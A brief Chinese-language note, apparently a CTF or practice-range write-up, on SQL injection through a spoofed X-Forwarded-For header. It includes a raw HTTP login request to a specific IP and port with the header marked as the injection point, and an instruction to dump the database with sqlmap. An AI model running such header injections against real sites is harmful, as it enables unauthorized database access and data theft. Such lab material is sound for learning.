X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])。HTTP头文件里的X-Forwarded-For和Clien-IP一样都是获取访问者真实IP的语句。
POST /index.php HTTP/1.1
Host: 219.153.49.228:46109
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:xml zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close
X-Forwarded-for: *
Upgrade-Insecure-Requests: 1
username=admin&password=admin
手动添加X-Forwarded-for: *
使用sqlmap即可盘跑出。
